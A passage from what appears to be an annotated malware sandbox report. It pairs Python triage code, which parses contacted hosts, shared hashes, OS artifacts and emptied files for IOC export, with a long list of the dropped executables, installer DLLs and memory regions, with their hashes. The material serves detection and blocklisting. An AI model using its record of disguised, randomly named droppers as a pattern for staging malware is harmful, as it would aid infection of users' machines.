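MD5 7af78ecfa55e8aeb8b699076266f7bcf
SHA256 f7284ade2ca0aeb432cf1fdae5ab0c724f81d10b914f6d4c2c15ef0f60ff316e

C:\Windows\system32\drivers\etc\hosts
MD5 d41d8cd98f00b204e9800998ecf8427e
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
"""
NET_RE = re.compile(r"^(?P<cc>[A-Z]{2}) (?P<ip>\d{1,3}(?:\.\d{1,3}){3}):(?P<port>\d+)"
                    r"(?: (?P<name>\S+))? (?P<proto>tcp|udp)$")
HASH_RE = re.compile(r"^(MD5|SHA1|SHA256|SHA512) ([0-9a-f]{32,128})$")
EMPTY_SHA256 = hashlib.sha256(b"").hexdigest()  # digest of zero bytes, computed not typed
# Files Windows, the CLR or PowerShell write by themselves (assumption: treat as noise).
OS_ARTIFACT_MARKERS = ("__PSScriptPolicyTest_", "\\CLR_v4.0\\UsageLogs\\",
                       "\\CryptnetUrlCache\\", "StartupProfileData-NonInteractive")

def ptr_to_ip(name):
    """'108.26.221.154.in-addr.arpa' -> '154.221.26.108'; None for any other name."""
    if not name or not name.endswith(".in-addr.arpa"):
        return None
    return ".".join(reversed(name[:-len(".in-addr.arpa")].split(".")))

def parse_network(text, resolver="8.8.8.8"):
    """Return ({(ip, port, proto): set(hostnames)}, {IPs reverse-resolved via resolver})."""
    contacts, ptr_ips = {}, set()
    for line in text.splitlines():
        m = NET_RE.match(line.strip())
        if not m:
            continue
        ip, port, name, proto = m["ip"], int(m["port"]), m["name"], m["proto"]
        if ip == resolver and port == 53:          # DNS chatter, not a contact
            if (rip := ptr_to_ip(name)):
                ptr_ips.add(rip)
        else:
            names = contacts.setdefault((ip, port, proto), set())
            if name and name != ip:                # a bare IP echoed as the name is no hostname
                names.add(name)
    return contacts, ptr_ips

def parse_files(text):
    """Return {path: {algo: hexdigest}}; memory/* dump lines carry no hashes and are skipped."""
    files, path = {}, None
    for line in map(str.strip, text.splitlines()):
        m = HASH_RE.match(line)
        if m and path is not None:
            files[path][m[1]] = m[2]
        elif line and not m:                       # a non-hash, non-blank line starts a record
            path = None if line.startswith("memory/") else line
            if path is not None:
                files.setdefault(path, {})
    return files

def shared_hashes(files, algo="SHA256"):
    """Digests recorded under more than one path -> sorted paths (copies and masquerades)."""
    by_hash = {}
    for path, digests in files.items():
        if algo in digests:
            by_hash.setdefault(digests[algo], set()).add(path)
    return {h: sorted(p) for h, p in by_hash.items() if len(p) > 1}

def os_artifacts(files):
    """Paths matching OS_ARTIFACT_MARKERS, so they can be set aside before IOC export."""
    return sorted(p for p in files if any(k in p for k in OS_ARTIFACT_MARKERS))

def triage(network_text, files_text):
    contacts, ptr_ips = parse_network(network_text)
    files = parse_files(files_text)
    return {"contacts": contacts,
            "ptr_checked": sorted(ip for ip, _, _ in contacts if ip in ptr_ips),
            "shared": shared_hashes(files), "os_artifacts": os_artifacts(files),
            "emptied": sorted(p for p, d in files.items() if d.get("SHA256") == EMPTY_SHA256)}

if __name__ == "__main__":
    print(triage(NETWORK_ROWS, FILE_RECORDS))
```

Feed the full Network and Files sections of a report to triage() in place of the embedded samples; the "contacts" keys are what goes on a blocklist, "shared" shows which drops are the same binary under different names, and "emptied" catches files that were wiped rather than written, which a hash-only IOC list would otherwise present as just another artifact.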

Files

memory/228-0-0x00007FF69F150000-0x00007FF69F52E000-memory.dmp

memory/708-6-0x00007FFCF6740000-0x00007FFCF712C000-memory.dmp

memory/708-5-0x0000028BD8D70000-0x0000028BD8D92000-memory.dmp

memory/708-7-0x0000028BF1220000-0x0000028BF1230000-memory.dmp

memory/708-8-0x0000028BF1220000-0x0000028BF1230000-memory.dmp

memory/708-11-0x0000028BF13B0000-0x0000028BF1426000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_g3uf4ppl.l0t.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/228-12-0x00007FF69F150000-0x00007FF69F52E000-memory.dmp

memory/932-25-0x0000000000400000-0x0000000000408000-memory.dmp

memory/708-30-0x0000028BF1220000-0x0000028BF1230000-memory.dmp

memory/932-28-0x0000000073300000-0x00000000739EE000-memory.dmp

memory/932-44-0x0000000005300000-0x0000000005310000-memory.dmp

memory/708-66-0x0000028BF1220000-0x0000028BF1230000-memory.dmp

memory/708-70-0x00007FFCF6740000-0x00007FFCF712C000-memory.dmp

C:\Users\Admin\Pictures\wW8toCx0Tryggk4RevW6qnGb.exe

MD5 dde72ae232dc63298465861482d7bb93
SHA1 557c5dbebc35bc82280e2a744a03ce5e78b3e6fb
SHA256 0032588b8d93a807cf0f48a806ccf125677503a6fabe4105a6dc69e81ace6091
SHA512 389eb8f7b18fcdd1a6f275ff8acad211a10445ff412221796cd645c9a6458719cced553561e2b4d438783459d02e494d5140c0d85f2b3df617b7b2e031d234b2

C:\Users\Admin\Pictures\0N3ystHYqNLyMAmfyjBLWUL1.exe

MD5 964bdba979c484e55a908c90d2730e16
SHA1 9127a71953cf9d16c860d4a64da7f8039a88586e
SHA256 d82c45f69039c845e06a293aa727223bc715ecdeb5fe1df0a7e3a7d30b1a818b
SHA512 f9c0c5ab8df012ca24cf53414c014f974702ccc3ad3eeadd1863c24a643fd566b918737ce7de3072d4112ff037f6c484004c05d9a0713ed1c3c98ac0ca2d0550

C:\Users\Admin\Pictures\lOvBq1ctYKdsFYCAOEiEgMz2.exe

MD5 fe469d9ce18f3bd33de41b8fd8701c4d
SHA1 99411eab81e0d7e8607e8fe0f715f635e541e52a
SHA256 b253f2cc3cafc35941d978a4d14b65610e641cb461e862fb0c155f3c30ce127a
SHA512 5b40c5259d01944e718bb14b8e6b994f2ea5bd391058aa8d086033cd609cb54231c7e07b4ab307ecfd5be28936e1c5576d3448504b99d9ac05c5442e5e1e85d9

memory/3080-99-0x0000000000400000-0x00000000004D8000-memory.dmp

C:\Users\Admin\Pictures\lOvBq1ctYKdsFYCAOEiEgMz2.exe

MD5 fe469d9ce18f3bd33de41b8fd8701c4d
SHA1 99411eab81e0d7e8607e8fe0f715f635e541e52a
SHA256 b253f2cc3cafc35941d978a4d14b65610e641cb461e862fb0c155f3c30ce127a
SHA512 5b40c5259d01944e718bb14b8e6b994f2ea5bd391058aa8d086033cd609cb54231c7e07b4ab307ecfd5be28936e1c5576d3448504b99d9ac05c5442e5e1e85d9

memory/4896-114-0x0000000000400000-0x000000000046A000-memory.dmp

C:\Users\Admin\Pictures\TGbHTIuRYu12xMG6nWaxWvI6.exe

MD5 6172d07e0711bc23642c3b6b86e4fec7
SHA1 c49a6bb96d15baa7d58ff9808c3311454959157b
SHA256 5bd34cee3edff3bedc453b25875218a4903a26c464159630514fb464c41ec4d6
SHA512 4374911d24f78fa501c7a015eb95c57f52192e47c5b9b9eeb6b972eb3e11c59e471d69aa97af619409fd5aa6e809c6c5310aa967b6aab69eeb40dc90131f076b

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

MD5 aebaf57299cd368f842cfa98f3b1658c
SHA1 cb4642f3425e8827e54a95c99a4b7aa1ae91d9b7
SHA256 d9131553ec5337523055e425db82038f4250fa60ea581bcc6921716477c652ce
SHA512 989ffc32678ae1505c3fb5befa9c281bfc87e33330bb5a23010a57766c4ce6dadbde86bd2a097ed8ac23195645abc50577dfe69191bb4bccdc77861488f6572e

C:\Users\Admin\AppData\Local\BNtSqdoCSUzvLmoAAiNIkrAw.exe

MD5 bb4d6d8d6784ae4027bf456a4da94a54
SHA1 1c16e598906a1a90e88370a8d6fdcacc3e3b48fc
SHA256 bd8dad5cc34e4f61c5f9616843888d1b351efbed57209c9c010fffd9a643c294
SHA512 c6cae52ecb21c613bad881414556ac1a6dc5293ff92ddb57aba8e0a5fb3251c2791f68c4dcc31a7ef631ee823a39ae29fda7ca0f764242bc4a2dade77b46c4f6

C:\Users\Admin\Pictures\IURAaM4iBeaOTAHNc2vSNNs3.exe

MD5 823b5fcdef282c5318b670008b9e6922
SHA1 d20cd5321d8a3d423af4c6dabc0ac905796bdc6d
SHA256 712f5bb403ca4ade2d3fa47b050aac51a9f573142fd8ba8bf18f5f8144214d8d
SHA512 4377d06a71291be3e52c28a2ada0b89ff185a8887c4a75972cdc5e85d95da6538d1776bc49fb190c67b8e6497225f1d63b86793f4095c8fb990a5f6659216472

C:\Users\Admin\AppData\Local\Temp\is-H9RIU.tmp\TGbHTIuRYu12xMG6nWaxWvI6.tmp

MD5 83827c13d95750c766e5bd293469a7f8
SHA1 d21b45e9c672d0f85b8b451ee0e824567bb23f91
SHA256 8bd7e6b4a6be9f3887ac6439e97d3d3c8aaa27211d02ecbd925ab1df39afe7ae
SHA512 cdbdd93fc637772b12bdedb59c4fb72a291da61e8c6b0061ad2f9448e8c949543f003646b1f5ce3e1e3aebc12de27409ddd76d3874b8f4f098163a1ff328b6f0

C:\Users\Admin\Pictures\Q0fnIUXTM79rNZPhQcruvlJ5.exe

MD5 bb4d6d8d6784ae4027bf456a4da94a54
SHA1 1c16e598906a1a90e88370a8d6fdcacc3e3b48fc
SHA256 bd8dad5cc34e4f61c5f9616843888d1b351efbed57209c9c010fffd9a643c294
SHA512 c6cae52ecb21c613bad881414556ac1a6dc5293ff92ddb57aba8e0a5fb3251c2791f68c4dcc31a7ef631ee823a39ae29fda7ca0f764242bc4a2dade77b46c4f6

memory/4628-151-0x0000000073300000-0x00000000739EE000-memory.dmp

memory/4628-146-0x00000000008A0000-0x0000000000BBC000-memory.dmp

C:\Users\Admin\Pictures\62feVopRHxuPs3P80VoHsWds.exe

MD5 7af78ecfa55e8aeb8b699076266f7bcf
SHA1 432c9deb88d92ae86c55de81af26527d7d1af673
SHA256 f7284ade2ca0aeb432cf1fdae5ab0c724f81d10b914f6d4c2c15ef0f60ff316e
SHA512 3c0ae6b6e4a896da52faff4fb2e958abb2856330cbba6ff4b7a59e7512475e1739cccf2cfda7dde492f381d3225263bc77e3154983e86933fa074696e92a059e

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

MD5 aebaf57299cd368f842cfa98f3b1658c
SHA1 cb4642f3425e8827e54a95c99a4b7aa1ae91d9b7
SHA256 d9131553ec5337523055e425db82038f4250fa60ea581bcc6921716477c652ce
SHA512 989ffc32678ae1505c3fb5befa9c281bfc87e33330bb5a23010a57766c4ce6dadbde86bd2a097ed8ac23195645abc50577dfe69191bb4bccdc77861488f6572e

C:\Users\Admin\Pictures\shZ2QlXdkmTmsk4zR41gLVc7.exe

MD5 9110c26b4e982d541e19db0d4dd07ac4
SHA1 712dfa47ee8c828f01efa976de006679df20dde4
SHA256 960fb23ba0b64e081c49e12ea5062d95f15b1d1ccb63e743dac5ead8d2defa58
SHA512 a9f1acc4b5d90d01c45761ccf22945c4cef50c132d59db48b85f03eaebd27939550677333869c89dfbe09236dcb0db0c824fce1a37da4c394a9871155795a378

C:\Users\Admin\Pictures\IURAaM4iBeaOTAHNc2vSNNs3.exe

MD5 823b5fcdef282c5318b670008b9e6922
SHA1 d20cd5321d8a3d423af4c6dabc0ac905796bdc6d
SHA256 712f5bb403ca4ade2d3fa47b050aac51a9f573142fd8ba8bf18f5f8144214d8d
SHA512 4377d06a71291be3e52c28a2ada0b89ff185a8887c4a75972cdc5e85d95da6538d1776bc49fb190c67b8e6497225f1d63b86793f4095c8fb990a5f6659216472

C:\Users\Admin\Pictures\OXfHzDyjJ3Wst2kNf3cg9erd.exe

MD5 9fd5293f6df01bd8e9daaf7820589b78
SHA1 be58cf67fc310d8b8fe706a6dccdffa52aeb1e35
SHA256 4f4c96457f0f44adcdbba07302ebaadb29d728ab9afc6c1605a54b7fe806c069
SHA512 8fea72232ec6e165dcd004399241ebfb93587fc5081b5f483e943520762b43c8572cd3dbe7a0990b22bbc38eb3be1a46aece1d627677f373b732910d339091ef

C:\Users\Admin\Pictures\TGbHTIuRYu12xMG6nWaxWvI6.exe

MD5 6172d07e0711bc23642c3b6b86e4fec7
SHA1 c49a6bb96d15baa7d58ff9808c3311454959157b
SHA256 5bd34cee3edff3bedc453b25875218a4903a26c464159630514fb464c41ec4d6
SHA512 4374911d24f78fa501c7a015eb95c57f52192e47c5b9b9eeb6b972eb3e11c59e471d69aa97af619409fd5aa6e809c6c5310aa967b6aab69eeb40dc90131f076b

C:\Users\Admin\Pictures\0N3ystHYqNLyMAmfyjBLWUL1.exe

MD5 964bdba979c484e55a908c90d2730e16
SHA1 9127a71953cf9d16c860d4a64da7f8039a88586e
SHA256 d82c45f69039c845e06a293aa727223bc715ecdeb5fe1df0a7e3a7d30b1a818b
SHA512 f9c0c5ab8df012ca24cf53414c014f974702ccc3ad3eeadd1863c24a643fd566b918737ce7de3072d4112ff037f6c484004c05d9a0713ed1c3c98ac0ca2d0550

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

MD5 aebaf57299cd368f842cfa98f3b1658c
SHA1 cb4642f3425e8827e54a95c99a4b7aa1ae91d9b7
SHA256 d9131553ec5337523055e425db82038f4250fa60ea581bcc6921716477c652ce
SHA512 989ffc32678ae1505c3fb5befa9c281bfc87e33330bb5a23010a57766c4ce6dadbde86bd2a097ed8ac23195645abc50577dfe69191bb4bccdc77861488f6572e

C:\Users\Admin\Pictures\8Q2InRdoMAfSeMpX80tmerhI.exe

MD5 aebaf57299cd368f842cfa98f3b1658c
SHA1 cb4642f3425e8827e54a95c99a4b7aa1ae91d9b7
SHA256 d9131553ec5337523055e425db82038f4250fa60ea581bcc6921716477c652ce
SHA512 989ffc32678ae1505c3fb5befa9c281bfc87e33330bb5a23010a57766c4ce6dadbde86bd2a097ed8ac23195645abc50577dfe69191bb4bccdc77861488f6572e

C:\Users\Admin\Pictures\IqALfhDHbGJ6YupG2e5WObJc.exe

MD5 24fe48030f7d3097d5882535b04c3fa8
SHA1 a689a999a5e62055bda8c21b1dbe92c119308def
SHA256 424a2551d356754c882d04ac16c63e6b50b80b159549d23231001f629455756e
SHA512 45a842447d5e9c10822f7d5db1192a0e8e7917e6546dab6aebe2542b5a82bedc26aa8d96e3e99de82e2d0b662fcac70d6914248371af034b763f5dd85dab0c51

C:\Users\Admin\AppData\Local\Temp\is-JTV0M.tmp\lOvBq1ctYKdsFYCAOEiEgMz2.tmp

MD5 ebec033f87337532b23d9398f649eec9
SHA1 c4335168ec2f70621f11f614fe24ccd16d15c9fb
SHA256 82fdd2282cf61cfa6155c51a82c4db79487ffeb377d0245d513edeb44d731c16
SHA512 3875c2dd9bbeb5be00c2ccf8391bcb92d328a3294ce5c2d31fd09f20d80e12bd610d5473dfc2e13962578e4bb75336615cdf16251489a31ecbe4873d09cf1b11

memory/932-160-0x0000000073300000-0x00000000739EE000-memory.dmp

C:\Users\Admin\Pictures\Q0fnIUXTM79rNZPhQcruvlJ5.exe

MD5 bb4d6d8d6784ae4027bf456a4da94a54
SHA1 1c16e598906a1a90e88370a8d6fdcacc3e3b48fc
SHA256 bd8dad5cc34e4f61c5f9616843888d1b351efbed57209c9c010fffd9a643c294
SHA512 c6cae52ecb21c613bad881414556ac1a6dc5293ff92ddb57aba8e0a5fb3251c2791f68c4dcc31a7ef631ee823a39ae29fda7ca0f764242bc4a2dade77b46c4f6

C:\Users\Admin\Pictures\O7qOvO0qMmQjettcsUNpgMj9.exe

MD5 4dcf3c5bf7efb2112eb1249a6c0a28bd
SHA1 f93aaf9f98154e0c23c2f0df806d46dd223f1a39
SHA256 86b86bf20ed0d0a79e459e9a040e0f398b0c6e186b3d4dfff5471f7c3bee002d
SHA512 3719722ccc3d0eb9eefc116bc8f719c2ce0c963fa735679049b984e2c4018f838f3aa340db9f1d9bea90c76beeb5292a192a7b2f99308af60de3fd4049b13024

memory/2248-168-0x0000000000B60000-0x00000000010AD000-memory.dmp

\Users\Admin\AppData\Local\Temp\Opera_installer_2310050449540302248.dll

MD5 e23e7fc90656694198494310a901921a
SHA1 341540eaf106932d51a3ac56cb07eeb6924f5ebd
SHA256 bf1aa65c0b76c41f6c27c89a527720958505e5568a63a7530494fb89e8fdcf75
SHA512 d0a437dac1af3587bc85a075d2ec3cf6e6cc23cdb6f4adfe8e87502c39c91807e7833b42aca63a85c0d329de89e348f71700b0ba9fca37fdf167f8b8ec25cf2d

memory/4628-171-0x0000000005810000-0x0000000005D0E000-memory.dmp

C:\Users\Admin\Pictures\bu5UWBMNJxJyXBl36BFg9XOI.exe

MD5 6e45986a505bed78232a8867b5860ea6
SHA1 51b142a7e60eecd73c3eaa143eadda4b7e64ac4c
SHA256 c957aa07aa1dd6d58aff2431b56b2139a0c2d5d6b34d20a978767e0daab58829
SHA512 d2d8bc6179795c1c255ec5ac16817f83ff97fcd90481dbe2325a351b448c48a83af03f22ff6dda0cb6ad2401c20b81d2871068aa9e32d2747cc2f5669b440fde

memory/3828-172-0x00000000008B0000-0x00000000008B1000-memory.dmp

C:\Users\Admin\Pictures\O7qOvO0qMmQjettcsUNpgMj9.exe

MD5 4dcf3c5bf7efb2112eb1249a6c0a28bd
SHA1 f93aaf9f98154e0c23c2f0df806d46dd223f1a39
SHA256 86b86bf20ed0d0a79e459e9a040e0f398b0c6e186b3d4dfff5471f7c3bee002d
SHA512 3719722ccc3d0eb9eefc116bc8f719c2ce0c963fa735679049b984e2c4018f838f3aa340db9f1d9bea90c76beeb5292a192a7b2f99308af60de3fd4049b13024

memory/4104-183-0x00007FF64FE30000-0x00007FF64FF1C000-memory.dmp

C:\Users\Admin\Pictures\O7qOvO0qMmQjettcsUNpgMj9.exe

MD5 4dcf3c5bf7efb2112eb1249a6c0a28bd
SHA1 f93aaf9f98154e0c23c2f0df806d46dd223f1a39
SHA256 86b86bf20ed0d0a79e459e9a040e0f398b0c6e186b3d4dfff5471f7c3bee002d
SHA512 3719722ccc3d0eb9eefc116bc8f719c2ce0c963fa735679049b984e2c4018f838f3aa340db9f1d9bea90c76beeb5292a192a7b2f99308af60de3fd4049b13024

memory/4940-187-0x00000000001F0000-0x00000000001F1000-memory.dmp

memory/4628-185-0x0000000005D10000-0x0000000005ED2000-memory.dmp

memory/4628-182-0x0000000005400000-0x0000000005492000-memory.dmp

\Users\Admin\AppData\Local\Temp\is-OKMTS.tmp\idp.dll

MD5 8f995688085bced38ba7795f60a5e1d3
SHA1 5b1ad67a149c05c50d6e388527af5c8a0af4343a
SHA256 203d7b61eac96de865ab3b586160e72c78d93ab5532b13d50ef27174126fd006
SHA512 043d41947ab69fc9297dcb5ad238acc2c35250d1172869945ed1a56894c10f93855f0210cbca41ceee9efb55fd56a35a4ec03c77e252409edc64bfb5fb821c35

memory/2472-192-0x0000000000B60000-0x00000000010AD000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-UJ6HF.tmp\_isetup\_setup64.tmp

MD5 e4211d6d009757c078a9fac7ff4f03d4
SHA1 019cd56ba687d39d12d4b13991c9a42ea6ba03da
SHA256 388a796580234efc95f3b1c70ad4cb44bfddc7ba0f9203bf4902b9929b136f95
SHA512 17257f15d843e88bb78adcfb48184b8ce22109cc2c99e709432728a392afae7b808ed32289ba397207172de990a354f15c2459b6797317da8ea18b040c85787e

memory/4628-197-0x00000000053F0000-0x0000000005400000-memory.dmp

memory/932-196-0x0000000005300000-0x0000000005310000-memory.dmp

memory/4628-193-0x00000000055E0000-0x0000000005646000-memory.dmp

memory/4628-191-0x0000000005540000-0x00000000055DC000-memory.dmp

\Users\Admin\AppData\Local\Temp\Opera_installer_2310050449550612472.dll

MD5 e23e7fc90656694198494310a901921a
SHA1 341540eaf106932d51a3ac56cb07eeb6924f5ebd
SHA256 bf1aa65c0b76c41f6c27c89a527720958505e5568a63a7530494fb89e8fdcf75
SHA512 d0a437dac1af3587bc85a075d2ec3cf6e6cc23cdb6f4adfe8e87502c39c91807e7833b42aca63a85c0d329de89e348f71700b0ba9fca37fdf167f8b8ec25cf2d

C:\Users\Admin\Pictures\O7qOvO0qMmQjettcsUNpgMj9.exe

MD5 4dcf3c5bf7efb2112eb1249a6c0a28bd
SHA1 f93aaf9f98154e0c23c2f0df806d46dd223f1a39
SHA256 86b86bf20ed0d0a79e459e9a040e0f398b0c6e186b3d4dfff5471f7c3bee002d
SHA512 3719722ccc3d0eb9eefc116bc8f719c2ce0c963fa735679049b984e2c4018f838f3aa340db9f1d9bea90c76beeb5292a192a7b2f99308af60de3fd4049b13024

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\O7qOvO0qMmQjettcsUNpgMj9.exe

MD5 4dcf3c5bf7efb2112eb1249a6c0a28bd
SHA1 f93aaf9f98154e0c23c2f0df806d46dd223f1a39
SHA256 86b86bf20ed0d0a79e459e9a040e0f398b0c6e186b3d4dfff5471f7c3bee002d
SHA512 3719722ccc3d0eb9eefc116bc8f719c2ce0c963fa735679049b984e2c4018f838f3aa340db9f1d9bea90c76beeb5292a192a7b2f99308af60de3fd4049b13024

C:\Users\Admin\AppData\Local\Temp\Opera_installer_2310050449569361200.dll

MD5 e23e7fc90656694198494310a901921a
SHA1 341540eaf106932d51a3ac56cb07eeb6924f5ebd
SHA256 bf1aa65c0b76c41f6c27c89a527720958505e5568a63a7530494fb89e8fdcf75
SHA512 d0a437dac1af3587bc85a075d2ec3cf6e6cc23cdb6f4adfe8e87502c39c91807e7833b42aca63a85c0d329de89e348f71700b0ba9fca37fdf167f8b8ec25cf2d

\Users\Admin\AppData\Local\Temp\Opera_installer_2310050449569361200.dll

MD5 e23e7fc90656694198494310a901921a
SHA1 341540eaf106932d51a3ac56cb07eeb6924f5ebd
SHA256 bf1aa65c0b76c41f6c27c89a527720958505e5568a63a7530494fb89e8fdcf75
SHA512 d0a437dac1af3587bc85a075d2ec3cf6e6cc23cdb6f4adfe8e87502c39c91807e7833b42aca63a85c0d329de89e348f71700b0ba9fca37fdf167f8b8ec25cf2d

memory/1200-206-0x0000000000DB0000-0x00000000012FD000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-JTV0M.tmp\lOvBq1ctYKdsFYCAOEiEgMz2.tmp

MD5 ebec033f87337532b23d9398f649eec9
SHA1 c4335168ec2f70621f11f614fe24ccd16d15c9fb
SHA256 82fdd2282cf61cfa6155c51a82c4db79487ffeb377d0245d513edeb44d731c16
SHA512 3875c2dd9bbeb5be00c2ccf8391bcb92d328a3294ce5c2d31fd09f20d80e12bd610d5473dfc2e13962578e4bb75336615cdf16251489a31ecbe4873d09cf1b11

C:\Users\Admin\Pictures\O7qOvO0qMmQjettcsUNpgMj9.exe

MD5 4dcf3c5bf7efb2112eb1249a6c0a28bd
SHA1 f93aaf9f98154e0c23c2f0df806d46dd223f1a39
SHA256 86b86bf20ed0d0a79e459e9a040e0f398b0c6e186b3d4dfff5471f7c3bee002d
SHA512 3719722ccc3d0eb9eefc116bc8f719c2ce0c963fa735679049b984e2c4018f838f3aa340db9f1d9bea90c76beeb5292a192a7b2f99308af60de3fd4049b13024

memory/3080-220-0x0000000000400000-0x00000000004D8000-memory.dmp

\Users\Admin\AppData\Local\Temp\Opera_installer_2310050449580465008.dll

MD5 e23e7fc90656694198494310a901921a
SHA1 341540eaf106932d51a3ac56cb07eeb6924f5ebd
SHA256 bf1aa65c0b76c41f6c27c89a527720958505e5568a63a7530494fb89e8fdcf75
SHA512 d0a437dac1af3587bc85a075d2ec3cf6e6cc23cdb6f4adfe8e87502c39c91807e7833b42aca63a85c0d329de89e348f71700b0ba9fca37fdf167f8b8ec25cf2d

memory/4896-223-0x0000000000400000-0x000000000046A000-memory.dmp

memory/4200-226-0x00007FF76EC10000-0x00007FF76F153000-memory.dmp

memory/4940-232-0x0000000000400000-0x0000000000513000-memory.dmp

C:\Users\Admin\Pictures\O7qOvO0qMmQjettcsUNpgMj9.exe

MD5 4dcf3c5bf7efb2112eb1249a6c0a28bd
SHA1 f93aaf9f98154e0c23c2f0df806d46dd223f1a39
SHA256 86b86bf20ed0d0a79e459e9a040e0f398b0c6e186b3d4dfff5471f7c3bee002d
SHA512 3719722ccc3d0eb9eefc116bc8f719c2ce0c963fa735679049b984e2c4018f838f3aa340db9f1d9bea90c76beeb5292a192a7b2f99308af60de3fd4049b13024

memory/3828-233-0x0000000000400000-0x000000000071C000-memory.dmp

memory/2248-234-0x0000000000B60000-0x00000000010AD000-memory.dmp

\Users\Admin\AppData\Local\Temp\Opera_installer_2310050449595304468.dll

MD5 e23e7fc90656694198494310a901921a
SHA1 341540eaf106932d51a3ac56cb07eeb6924f5ebd
SHA256 bf1aa65c0b76c41f6c27c89a527720958505e5568a63a7530494fb89e8fdcf75
SHA512 d0a437dac1af3587bc85a075d2ec3cf6e6cc23cdb6f4adfe8e87502c39c91807e7833b42aca63a85c0d329de89e348f71700b0ba9fca37fdf167f8b8ec25cf2d

memory/5008-246-0x0000000000B60000-0x00000000010AD000-memory.dmp

memory/4468-248-0x0000000000B60000-0x00000000010AD000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\713497151363

MD5 7715b6d8955da4bf4f7f3615ebcd5d16
SHA1 6cd420c7a0e96e96341b43d99dd623299a8bbc1f
SHA256 5275ccd3e5ee7faa9dd10363900a86dc5039a40de9fcfb5790d2d2f9f8e2700a
SHA512 25884d4311cb11cb82a2650695f92d7d2757c3bf31824c30ac457cf8cecd2fb3648cb5de80c1305678dc7cddf627fd88bacc0bd2f0fbb648b85b80f858ac610d

memory/1200-213-0x0000000000DB0000-0x00000000012FD000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

MD5 1bfe591a4fe3d91b03cdf26eaacd8f89
SHA1 719c37c320f518ac168c86723724891950911cea
SHA256 9cf94355051bf0f4a45724ca20d1cc02f76371b963ab7d1e38bd8997737b13d8
SHA512 02f88da4b610678c31664609bcfa9d61db8d0b0617649981af948f670f41a6207b4ec19fecce7385a24e0c609cbbf3f2b79a8acaf09a03c2c432cc4dce75e9db

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

MD5 1ce65bbc83e7d7317440bfe0834cbef2
SHA1 f4804773cf223032389ab1e8666403d4ec4986e4
SHA256 f2ce0b72fc9a7c84d53d88279d483225fbf9801bec8dcfbabfc1aec25bf5c743
SHA512 7754c0af0335d0446c8e5a5bce0a28713d47ae356ec4de4a855cdd3cfd1b6fbe4bda69e6eae60b51b10d835cac75f56b2c9bd6cf0ab154208f4a9f683ddce447

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

MD5 60fe01df86be2e5331b0cdbe86165686
SHA1 2a79f9713c3f192862ff80508062e64e8e0b29bd
SHA256 c08ccbc876cd5a7cdfa9670f9637da57f6a1282198a9bc71fc7d7247a6e5b7a8
SHA512 ef9f9a4dedcbfe339f4f3d07fb614645596c6f2b15608bdccdad492578b735f7cb075bdaa07178c764582ee345857ec4665f90342694e6a60786bb3d9b3a3d23

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

MD5 05653ef855c4f21ee677d832bd53b90f
SHA1 3642996fe690e7392f1df653dd3150a6d6c62b0f
SHA256 bdabfcd7b2658b6105280858371477b44e84f54ba304c1dbdd602595e8344c7d
SHA512 46594a3306f5abd676f29ef13ba29ac3f7717da5796ae40b7d1ff8bb9770bcdbd3a09f4f1176821fb780b27ae1297d859261f587acbff095584835a6025c1ead

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports\settings.dat

MD5 ed8131e04edd227d44cbdcf49481ddd5
SHA1 ecca97110a19e45f02969954a083eef340162563
SHA256 7752a3bbc8005b0a0e1dc961667a8599041a33ca7a666eedb34b91c4d8c16185
SHA512 56e160af63b4eca9a9bbea7f05e2d3893ad37e9126892eb1f993935cec8d9fa2a5f7a6632bba0973ebf9d7fac8cb9c05cd1ea56b55fb01ce73a5463f3137d32a

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

MD5 aebaf57299cd368f842cfa98f3b1658c
SHA1 cb4642f3425e8827e54a95c99a4b7aa1ae91d9b7
SHA256 d9131553ec5337523055e425db82038f4250fa60ea581bcc6921716477c652ce
SHA512 989ffc32678ae1505c3fb5befa9c281bfc87e33330bb5a23010a57766c4ce6dadbde86bd2a097ed8ac23195645abc50577dfe69191bb4bccdc77861488f6572e

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports\settings.dat

MD5 ed8131e04edd227d44cbdcf49481ddd5
SHA1 ecca97110a19e45f02969954a083eef340162563
SHA256 7752a3bbc8005b0a0e1dc961667a8599041a33ca7a666eedb34b91c4d8c16185
SHA512 56e160af63b4eca9a9bbea7f05e2d3893ad37e9126892eb1f993935cec8d9fa2a5f7a6632bba0973ebf9d7fac8cb9c05cd1ea56b55fb01ce73a5463f3137d32a

memory/4628-302-0x0000000006810000-0x0000000006D3C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 8592ba100a78835a6b94d5949e13dfc1
SHA1 63e901200ab9a57c7dd4c078d7f75dcd3b357020
SHA256 fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
